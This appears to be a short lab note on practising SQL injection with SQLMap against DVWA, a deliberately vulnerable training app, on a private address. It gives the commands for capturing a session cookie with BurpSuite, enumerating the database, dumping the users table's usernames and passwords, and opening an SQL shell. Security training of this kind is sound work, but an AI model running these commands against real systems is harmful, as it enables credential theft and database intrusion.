Practice on using SQLMap to detect and exploit SQL injection vulnerabilities on DVWA in low security mode.
Open BurpSuite → Proxy → Intercept. Enable interception and navigate to DVWA to capture the session cookie.
sudo sqlmap \
-u "http://10.0.2.4/dvwa/vulnerabilities/sqli/?id=%27&Submit=Submit#" \
--cookie "security=low; PHPSESSID=9ben154elh1p2k3258ugb89r16" \
-a
sudo sqlmap [url] [cookie] --current-db --current-user
sudo sqlmap [url] [cookie] -D dvwa -T users --columns
sudo sqlmap [url] [cookie] -D dvwa -T users -C user,password --dump
sudo sqlmap [url] [cookie] -D dvwa --sql-shell